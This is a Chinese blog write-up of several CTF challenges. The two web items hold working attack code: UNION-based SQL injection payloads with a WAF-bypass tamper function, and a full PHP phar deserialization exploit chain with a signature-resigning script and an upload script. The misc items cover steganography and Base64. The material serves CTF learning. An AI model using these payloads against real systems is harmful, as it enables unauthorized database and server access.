文章目录
前言:
不多但都是自己认认真真复盘的
里面的代码都是自己敲出来的
毕竟人家复盘讲解啥的给你看看就不错了~
复习周来了,不得不去。
有收获的话就给个赞吧…
首发于 https://sleepymonster.cn/
【WEB】sql_checkin
题目来自
2021暨南大学新生赛决赛Web签到题
直接放WAF
<?php
function waf($var)
{
if(preg_match("/select|union|or|ro|where/", $var)){
return 'no no no';
}
else{
return $var;
}
}
这是一道非常基础的题,过程我就不放了,放个脚本吧。
一步步做就很方便,具体怎么改操作tamper就好了
def tamper(payload, **kwargs):
payload= payload.lower()
payload= payload.replace('group_contact' , 'GROUP_CONCAT') # 因为是函数 所以就不支持大小写混用
payload= payload.replace('select' , 'Select')
payload= payload.replace('union' , 'Union')
payload= payload.replace('or' , 'Or')
payload= payload.replace('ro' , 'Ro')
payload= payload.replace('where' , 'Where')
retVal=payload
return retVal
database = 'easysql'
table = 'flag'
column = 'flag'
payloadFindField = '" union select 1,2,3 #'
payloadFindFlag = f'" union select 1,2,(select {column} from {database}.{table}) #'
payloadFindColumn = f'" union select 1,2,(select group_contact(column_name) from information_schema.columns where table_schema="{database}" and table_name="{table}") #'
payloadFindTable = f'" union select 1,2,(select group_contact(table_name) from information_schema.tables where table_schema="{database}") #'
payloadFindDataBase = '" union select 1,2,(select group_contact(schema_name) from information_schema.schemata) #'
payloadArray = [payloadFindDataBase, payloadFindTable, payloadFindColumn, payloadFindFlag]
payloadDescription = ['判断数据库','判断数据表','判断数据列','拿到Flag']
progress = 0 + int(database is not '') + int(table is not '') + int(column is not '')
print(f'[*] 请先判断字段:{payloadFindField}')
print(f'[*] 当前进度:{payloadDescription[progress]}, 请复制下一行的话进行注入')
print(tamper(payloadArray[progress]))
【杂项】easy_misc
题目来自 2021暨南大学新生赛初赛
莫斯密码解密
解密网站:http://www.hiencode.com/morse.html
lsb加密隐写
用了stegsolve找不到
用了zsteg zsteg ./lalala.png -v还是不行
找了Steghide以为是把密码写到文件里面然后用莫斯那个密码解出来,还是不行
Steghide 参考链接 https://www.jianshu.com/p/c3679f805a0c
最后是问了大佬 https://github.com/livz/cloacked-pixel
开始动手~
拿到解压密码 this_is_the_second_password
栅栏密码
解密网站:https://www.qqxiuzi.cn/bianma/zhalanmima.php
【杂项】Un(ix)zip
题目来自 第四届2021美团网络安全高校挑战赛
unixzip
unzip 就是解压,unix就是在unix下
一共有36位然后依照顺序连起来
ZmxhZ3tXZWxjMG1lX1VuejFwX1dvbmRlcjR9
Base64
Base64算法
第一步,“M”、“a”、"n"的ASCII值分别是77、97、110,对应的二进制值是01001101、01100001、01101110,将它们连成一个24位的二进制字符串010011010110000101101110。
第二步,将这个24位的二进制字符串分成4组,每组6个二进制位:010011、010110、000101、101110。
第三步,在每组前面加两个00,扩展成32个二进制位,即四个字节:00010011、00010110、00000101、00101110。它们的十进制值分别是19、22、5、46。
第四步,根据表格,得到每个值对应Base64编码,即T、W、F、u。
如果字节数不足三(余2 与 余1)
- “M”、“a” => 01001101、01100001 => 010011|010110|0001=> 00010011|00010110|00000100(最后一组除了前面加两个0以外,后面也要加两个0) => 对应Base64值分别为T、W、E,再补上一个"="号,因此"Ma"的Base64编码就是TWE=
- “M” => 01001101 => 010011|01 => 00010011 | 00010000 => TQ== 补上二个"="号
上面的一共有36位 一个字母为一个字节即8Bit 为3的倍数
import base64
print(base64.b64decode("ZmxhZ3tXZWxjMG1lX1VuejFwX1dvbmRlcjR9"))
【杂项】Do_you_konw_school_motto(复现)
题目来自 2021年暨南大学新生赛决赛
Mp3隐写
一般是查询谱写,隐谱图。
发现了个工具箱整理:太长了
工具🔧 https://www.petitcolas.net/steganography/mp3stego/
IP置换盒?
我直接好家伙:其实拼图算法就出来了
但是! 图片损坏了。
$ sudo ./gaps --image=question.png --generations=20 --population=600 --size=200
所以很难受 不得不跟着做
参考链接: DES加密算法中的IP置换算法
import cv2
import numpy as np
IP_BOX = [
[58, 50, 42, 34, 26, 18, 10, 2],
[60, 52, 44, 36, 28, 20, 12, 4],
[62, 54, 46, 38, 30, 22, 14, 6],
[64, 56, 48, 40, 32, 24, 16, 8],
[57, 49, 41, 33, 25, 17, 9, 1],
[59, 51, 43, 35, 27, 19, 11, 3],
[61, 53, 45, 37, 29, 21, 13, 5],
[63, 55, 47, 39, 31, 23, 15, 7]
]
IP_NBOX = [
[40, 8, 48, 16, 56, 24, 64, 32],
[39, 7, 47, 15, 55, 23, 63, 31],
[38, 6, 46, 14, 54, 22, 62, 30],
[37, 5, 45, 13, 53, 21, 61, 29],
[36, 4, 44, 12, 52, 20, 60, 28],
[35, 3, 43, 11, 51, 19, 59, 27],
[34, 2, 42, 10, 50, 18, 58, 26],
[33, 1, 41, 9, 49, 17, 57, 25]
]
def IP(path, cutNum, toPath):
img = cv2.imread(path)
m, n , _ = img.shape
block_size = m // cutNum
res = np.zeros((m,n,3))
for i in range(cutNum):
for j in range(cutNum):
r = (IP_BOX[i][j] - 1) // cutNum
c = (IP_BOX[i][j] - 1) % cutNum
res[i * block_size:(i +1 ) * block_size, j * block_size:(j +1 ) * block_size, :] = img[r * block_size:(r + 1) * block_size, c * block_size:(c +1 ) * block_size, :]
cv2.imwrite(toPath, res)
def IPR(Path, cutNum, toPath):
img = cv2.imread(Path)
m, n , _ = img.shape
block_size = m // cutNum
res = np.zeros((m,n,3))
for i in range(cutNum):
for j in range(cutNum):
r = (IP_NBOX[i][j] - 1) // cutNum
c = (IP_NBOX[i][j] - 1) % cutNum
res[i * block_size:(i +1 ) * block_size, j * block_size:(j +1 ) * block_size, :] = img[r * block_size:(r + 1) * block_size, c * block_size:(c +1 ) * block_size, :] # 进行调换
cv2.imwrite(toPath, res)
IPR('./question.png',8,'out.png')
lsb加密隐写
查看得到密码 8GpsKK2Ca!
$ python2 lsb.py extract ./out.png out 8GpsKK2Ca!
拿到flag flag{rAnd0m_1sB_1s_fUN}
【WEB】medium-unserialize【复现】
题目来自 2021暨南大学新生赛决赛
仓库地址:https://github.com/mi3aka/xp0int-2021-ctf-web/tree/master/medium-unserialize
了解整个逻辑
我学完了我在最开始来总结下整个思路吧。
我相信带着答案反推学习应该是不错的。
首先是**Main**类是唯一能控制的地方,即**Main**中的data和str是唯一能传值的地方。str处的过滤是为了限定死就是只能上传phar文件来触发反序列化。data的写就是把phar用python写进去,读的话就是file_exists会触发phar包的反序列化。然后data写入的绕过为file_put_contents为数组/资源绕过,而我们上传的phar包相当于免疫了此处的preg_match。到这里可以自由写入文件以及触发反序列化。
然后就是开始构造pop链。从**Welcome**开始进入。sha1与sha2是要用原生类报错来绕过。才能进入下面的if。wow没必要进去,但是通过md5($this->welcome)判断的时候会触发__toString() 方法来开始触发pop链。来到**User**里面调用$this->private_info['address']是个类的话,继续触发。来到**Filter**触发get()用于从不可访问的属性读取数据,这里是因为$this->private_info['address']->birthplace来触发。此时的$name就是birthplace为参数了, 去调用get($name)方法。而此时$this->params设置键为birthplace值为**flag**类来触发call_user_func从而拿到了flag。
可以看到Route,Info,Method类都是障眼法..除了常见的类之外还要了解—get(),__toString()等,以及Phar等。复盘不易,代码都是自己敲了一遍。
Phar反序列化
思路就是:
file_put_contents https://www.php.net/manual/zh/function.file-put-contents.php
类型可以是 string,array 或者是 stream 资源 即$_POST[“data”]可以为数组绕过后正常写入文件
先激活Main类绕过了Waf后进行文件的写入
再通过file_exists($data) 进行phar反序列化 激活上面的一串类
意思就是先写入了文件之后呢,再用file_exists去访问该文件,
访问的时候会触发
phar:///tmp/xxx.xpoint解析,如果符合phar文件则会触发里面的反序列化 达到效果。
class Main # 用于写入过waf写文件的
{
public $operate;
public function __destruct()
{
echo "进入了Main的__destruct".'</br>';
if (!isset($_POST["data"]) || preg_match('/GBMB|file|http|ftp|php|zlib|data|glob|ssh2|rar|ogg|expect|filter|read|base|rot|get|post|class|Welcome|Route|Info|User|Filter|Method|Flag|zip|tar/i', $_POST["data"])) {
die("???");
}
$data = $_POST["data"];
echo "当前的data为:".$data.'</br>';
// 反序列化之后Main类的operate为'w'/'r'
if ($this->operate === 'w') {
$filename = "./tmp/" . md5(time()) . ".xp0int";
file_put_contents($filename, $data);
echo $filename.'</br>';
} else if ($this->operate === 'r') {
if (file_exists($data)) {
echo("wow!!!<br>");
} else {
die("No File!!!");
}
}
}
}
原生类的反序列化
绕过instanceof与sha与md5r绕过
instanceof 用于确定一个PHP 变量是否属于某一类class 的实例
第一处: $this->sha1 与 $this->sha2 不能为空;不能为数组;sha1 与 md5要相等;还都不是以上那些类中;
class Welcome
{
public $welcome;
public $randcode;
public $code;
public $sha1;
public $sha2;
public function __construct()
{
$this->welcome = "Welcome to Xp0int-CTF";
echo $this->welcome . "<br>";
}
public function __destruct()
{
$this->randcode = rand(1, 10086);
if ($this->sha1 instanceof Filter || $this->sha1 instanceof Route || $this->sha1 instanceof User || $this->sha1 instanceof Info || $this->sha1 instanceof Method || $this->sha2 instanceof Filter || $this->sha2 instanceof Route || $this->sha2 instanceof User || $this->sha2 instanceof Info || $this->sha2 instanceof Method || empty($this->sha1) || empty($this->sha2) || is_array($this->sha1) || is_array($this->sha2) || ($this->sha1 == $this->sha2) || !(sha1($this->sha1) === sha1($this->sha2)) || !(md5($this->sha1) === md5($this->sha2))) {
die("no no no");// $this->sha1 与 $this->sha2 不能为空;不能为数组;sha1 与 md5要相等;还都不是以上那些类中;
}
if ($this->randcode === $this->code && md5($this->welcome) === md5(time())) {
echo("wow!!!<br>"); // 绕过恒等
} else {
die("(:");
}
}
}
// 使用原生类来绕过第一处
$a = new Exception($message = 'php', $code = 0);$b = new Exception($message = 'php', $code = 1);
var_dump($a);
var_dump($b);
var_dump($a == $b);
echo $a.'</br>';
echo $b.'</br>';
// 会调用toString方法
var_dump(md5($a));
var_dump(md5($b));
var_dump(md5($a) == md5($b));
var_dump(sha1($a));
var_dump(sha1($b));
var_dump(sha1($a) == sha1($b));
// $randcode 与 $code 在一个类中
// 要完全相同则把地址给对方就好了
// 当然这里是障眼法
// md5 就是要去触发后面的魔术方法
class demo
{
public $randcode;
public $code;
public function __destruct(){
$this->randcode = rand(1, 10086);
if ($this->randcode === $this->code) {
echo("wow!!!<br>");
} else {
die("(:");
}
}
}
$one = new demo();
$one->code = & $one->randcode;
$a = serialize($one);
var_dump($a);
强制垃圾回收gc
throw new Error("I can't destruct,help!!!");
执行phar会触发throw new Error,如何绕过?
在这里正常情况下的话:wakeup之后的话会执行throw new Error而不会执行destruct
所以我们为了执行destruct需要采用强制垃圾回收gc方法。
跟着大佬的复盘我也来复现下
<?php
class demo1
{
public function __wakeup(){
echo "我是demo1, 我苏醒了。"."</br>";
$this->hello();
}
public function hello(){
echo "我是demo1, 我执行了hello"."</br>";
}
public function __destruct(){
echo "我是demo1, 我被销毁了"."</br>";
}
}
class demo2
{
public function __wakeup(){
echo "我是demo2, 我苏醒了。"."</br>";
$this->hello();
}
public function hello(){
echo "我是demo2, 我执行了hello"."</br>";
}
public function __destruct(){
echo "我是demo2, 我被销毁了"."</br>";
}
}
// 其中 “a” 表示这是个数组,其中 “i” 表示 整型,“o” 表示对象。
$str = 'a:2:{i:0;O:5:"demo1":0:{}i:1;O:5:"demo2":0:{}}';
$tmp = unserialize($str);
var_dump($tmp);
// throw new Error("I can't destruct,help!!!");
如果打开了throw new Error("I can't destruct,help!!!");注释:
绕过方法有2个:
$str = 'a:2:{i:0;O:5:"demo1":0:{}i:0;O:5:"demo2":0:{}}';1 => 0
即demo1成功绕过throw new Error执行
$str = 'a:2:{i:0;O:5:"demo1":0:{}}';
构造phar包
class fake{}
$flag = new Flag();
$welcome = new Welcome();
$filter = new Filter();
$filter->params = array("birthplace" => array($flag, "getflag"));
$user = new User(array(1,2,3), array("address"=>$filter));
$welcome->code = & $welcome->randcode;
$welcome->welcome = $user;
$sha1 = new Error($message = 'test', $code = 0); $sha2 = new Error($message = 'test', $code = 1); # 不要换行
$welcome->sha1 = $sha1;
$welcome->sha2 = $sha2;
$fake = new fake();
$a = array($welcome, $fake);
var_dump(serialize($a));
$phar = new Phar("source.phar"); // 构造phar文件时后缀必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); // 设置存根stub
$phar->setMetadata($a); // 将自定义的meta-data序列化后存入manifest
$phar->addFromString("a", "a"); // phar本质上是对文件的压缩所以要添加文件名字和内容
$phar->stopBuffering();
签名更改
参考链接 :https://www.php.net/manual/zh/phar.fileformat.signature.php
生成phar包后进行第二次篡改, 为了就是能强制进行垃圾回收。
import gzip
import hashlib
def resign(source, target):
phar = None
with open(source, "rb") as f:
phar = f.read()
if b'i:1;O:4:"fake"' in phar:
phar = phar.replace(b'i:1;O:4:"fake"', b'i:0;O:4:"fake"')
print('更改成功')
else:
print('没找到')
source = phar[:-28] # 需要进行签名的数据 20 + 4 + 4
GBMB = phar[-8:] # 签名标志(通常为sha1??)和GBMB标签
signature = hashlib.sha1(source).digest() # sha1签名 # 20位数
phar = source + signature + GBMB
with open(target, "wb") as f:
f.write(phar)
def convert(source, target="a"):
phar = None
with open(source, "rb") as f:
phar = f.read()
with gzip.open(target, "wb") as f:
f.write(phar)
source = '/Applications/MxSrvs/www/source.phar'
target = '/Applications/MxSrvs/www/target.phar'
resign(source, target)
convert(target)
左上是没有gzip的 左下是经过zip的 右边的就是对比
上传phar包
import requests
import re
url = ""
phar = None
pharPath = '/Applications/MxSrvs/www/target.phar'
with open(pharPath, 'rb') as f:
phar = f.read()
data = {
'str' : 'O:4:"Main":1:{s:7:"operate";s:1:"w";}',
'data' : phar
}
r = requests.post(url=url, data=data)
rule = r'</code>(.+?)<br />'
result = re.findall(rule, r.text)
print(result)
最后再去触发
// payload:
str=O:4:"Main":1:{s:7:"operate";s:1:"r";}&data=phar///temp/xxxx.xpoint
扫一扫
2545
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
